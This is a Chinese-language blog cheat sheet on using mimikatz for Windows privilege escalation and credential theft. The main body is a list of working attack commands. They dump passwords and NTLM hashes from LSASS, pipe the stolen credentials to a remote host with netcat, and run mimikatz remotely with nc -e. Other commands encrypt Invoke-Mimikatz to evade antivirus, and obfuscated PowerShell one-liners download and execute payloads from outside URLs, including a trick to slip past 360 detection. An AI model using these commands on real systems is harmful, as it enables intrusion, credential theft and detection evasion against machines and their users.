2. 程式人生 > 實用技巧 >windows提權之mimikatz

windows提權之mimikatz

阿新 發佈:2020-08-19

mimikatz

privilege::debug   #提權命令
sekurlsa::logonPasswords    #抓取密碼
winmine::infos  #掃雷作弊
lsadump::lsa /patch   #獲取當前此計算機存在過使用者的NTLMHASH

procdump64.exe -accepteula -ma lsass.exe lsass.dmp #匯出為lsass.dump檔案
sekurlsa::minidump lsass.dmp  #配合procdumo將李颯颯啊、程序記憶體檔案匯出到本地,並利用mimikatz進行密碼的讀取
sekurlsa::minidump logonPasswords full

配合使用:

將輸出傳輸到遠端機器:

nc -lvp 4444
mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit | nc.exe -vv 192.168.114.136 4444

通過nc遠端執行Mimikatz:  

nc -lvp 443
nc.exe -vv 192.168.114.136 443 -e mimikatz.exe

當無法抓取新密碼的時候:

privilege::debug
misc::memssp

其他功能:

system::user   #檢視當前登入的系統使用者
system::computer #返回當前的計算機名稱
ts::sessions   #顯示當前的會話
ts::processes windows-d.vm.nirvana.local   %顯示伺服器的程序和對應的pid情況等。
免殺

Get-ExecutionPolicy  #結果顯示restricted
Set-ExecutionPolicy Unrestricted  #開啟限制
Import-Module ./xencrypt.ps1   #加密invoke-mimikatz.ps1

Invoke-Xencrypt -InFile C:\Users\Dell\Desktop\工具集\一句話連線,菜刀冰蠍\xencrypt-master\Invoke-Mimikatz.ps1 -OutFile C:\Users\Dell\Desktop\工具集\一句話連線,菜刀冰蠍\xencrypt-master\xenmimi.ps1

usage:  
Import-Module .\xenmimi.ps1
Invoke-Mimikatz   


通過-Iterations標誌支援遞迴分層加密:
Import-Module ./xencrypt.ps1
Invoke-Xencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1 -Iterations 100

usage:

Import-Module .\xenmimi.ps1
Invoke-Mimikatz

遠端載入/Powershell免殺
powershell "IEX (New-ObjectNet.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz-DumpCreds"

此時360判斷為PowerShell下載攻擊並彈窗,360針對powershell的http協議下載查殺,但是檢查內容只是命令中出現http,所以只需要一步簡單的替換即可繞過('htxtp://is.gd/oeoFuI' -replace 'x','')。  

也可以簡單混淆:  

powershell -c " ('IEX '+'(Ne'+'w-O'+'bject Ne'+'t.W'+'ebClien'+'t).Do'+'wnloadS'+'trin'+'g'+'('+'1vchttp://'+'192.168.0'+'.101/'+'Inv'+'oke-Mimik'+'a'+'tz.'+'ps11v'+'c)'+';'+'I'+'nvoke-Mimika'+'tz').REplaCE('1vc',[STRing][CHAR]39)|IeX"

#在Windows server 2008 及之前 可以使用此命令

powershell "IEX (New-ObjectNet.WebClient).DownloadString(('htxtp://is.gd/oeoFuI' -replace 'x',''));Invoke-Mimikatz -DumpCreds"  

這樣就好了。

powershell載入exe進記憶體執行需要PowerSploit中的Invoke-ReflectivePEInjection指令碼。  

powershell.exe -exec bypass IEX (New-ObjectNet.WebClient).DownloadString(('htxtp://suo.im/5FAjaC' -replace'x',''));Invoke-ReflectivePEInjection -PEUrlhttp://x.x.x.x/mimikatz.exe-ExeArgs"sekurlsa::logonpasswords" -ForceASLR

#Windows server 2009 及之後

powershell "IEX (New-Object Net.WebClient).DownloadString('https://url.cn/wv7uNQrc'); Invoke-Mimikatz"
msf使用
在meterpreter中載入mimikatz模組
load mimikatz

相關推薦

windowsmimikatz

mimikatz privilege::debug#命令 sekurlsa::logonPasswords#抓取密碼 winmine::infos#掃雷作弊

windows

schtasks命令使用 schtasks命令比at命令更靈活。而且在Windows Vista、Windows Server 2008及之後版本的作業系統已經棄用at命令。建立一個名稱為\"test\"的計劃任務,啟動許可權為system

[總結]Windows總結

0x01 簡介 可分為縱向與橫向:縱向:低許可權角色獲得高許可權角色的許可權;橫向:獲取同級別角色的許可權。

windows常用系統漏洞與補丁編號速查對照表

#Security Bulletin#KB#Description#Operating System CVE-2020-0787 [Windows Background Intelligent Transfer Service Elevation of Privilege Vulnerability] (Windows 7/8/10, 2008/2012/2016/2019)

mysqludf

UDF UDF(user defined function)使用者自定義函式,是mysql的一個拓展介面。使用者可以通過自定義函式實現在mysql中無法方便實現的功能,其新增的新函式都可以在sql語句中呼叫。 它有3種返回值,這三種分別是

Windows的幾種常用姿勢

當獲取主機許可權時,我們總是希望可以將普通使用者提升為管理員使用者,以便獲得高許可權完全控制目標主機。Windows常用的提權方式有:核心提權、資料庫提權、系統配置錯誤提權、組策略首選項提權、Bypass UAC提權

Windows總結

當以低使用者進去一個陌生的windows機器後,無論是還是後續做什麼,第一步肯定要儘可能的蒐集資訊。知己知彼,才百戰不殆。

Windows總結(一)——資料庫與系統漏洞

Windows總結(一) Windows總結(1)——資料庫與系統漏洞 0x01 核心漏洞

Windows(二)——組策略與UAC

Windows(二) Windows總結(2)——繞過UAC與令牌竊取 接上回,本章我們主要介紹bypass UAC、組策略與令牌竊取

MySQL啟動項——開機啟動的程式,那時候啟動的程式許可權都是system

關於MySQL的啟動項提權,聽其名知其意。就是將一段 VBS指令碼匯入到 C:\\Documents and Settings\\All Users\\「開始」選單\\程式\\啟動 下,如果管理員重啟了伺服器,那麼就會自動呼叫該指令碼,並執行其中的使用者

MSSQLxp_cmdshell、SP_OACreate

在xp_cmdshell被刪除或者出錯情況下,可以充分利用SP_OACreate進行 首先 EXEC sp_configure \'show advanced options\', 1;

Linux sudo 軟連結攻擊

軟連結提權的原理 低許可權使用者能夠以 root 使用者的許可權執行某個指令碼,該指令碼中又使用到了諸如 chown 等命令修改檔案的許可權,且該檔案又能夠被低許可權的使用者所修改。因此低許可權的使用者可以刪除該檔

Kali虛擬機器利用msf17-010執行RCE(針對Windows Server 2008以及2003)

寫在前面: 老師上課的演示是利用了ms17-010的exploit/windows/smb/ms17_010_enternalblue,我們可以通過use exploit/windows/smb/ms17_010_enternalblue再info檢視適用於什麼版本,否則拿這個去攻擊Windows Server 2

MS16-032 windows本地

試用系統:Tested on x32 Win7,x64 Win8,x64 2k12R2 powershell指令碼: https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1

Windows Win32k 許可權漏洞

0X01  簡介:   本篇文章將集中介紹兩個利用windows win32k服務的漏洞。

Mysql-基於Mysql的UDFWindows系統)1

實驗宣告:本實驗教程僅供研究學習使用,請勿用於非法用途,違者一律自行承擔所有風險!

Mysql-基於Mysql的UDFWindows系統)2

實驗宣告:本實驗教程僅供研究學習使用,請勿用於非法用途,違者一律自行承擔所有風險!

Axis2預設弱口令後臺Getshell+windows反彈webshell+metasploit

上傳aar包獲取webshell 預設弱口令進入axis2控制檯 http://ip:port/axis2/axis2-admin/login 預設口令密碼

輔助工具:Windows--exploit-suggester.py安裝及使用

下載地址 https://github.com/AonCyberLabs/Windows-Exploit-Suggester 1、安裝xlrd包(注意python2、3版本的pip問題) 使用python2 的pip來安裝xlrd包 命令:python2 -m pip install xlrd==1.2.0 注意: 安裝的xl

Windows原理深入學習系列-Windows核心

這是[信安成長計劃]的第 22 篇文章 0x00 目錄 0x01 介紹 0x02 替換 Token 0x03 編輯 ACL 0x04 修改 Privileges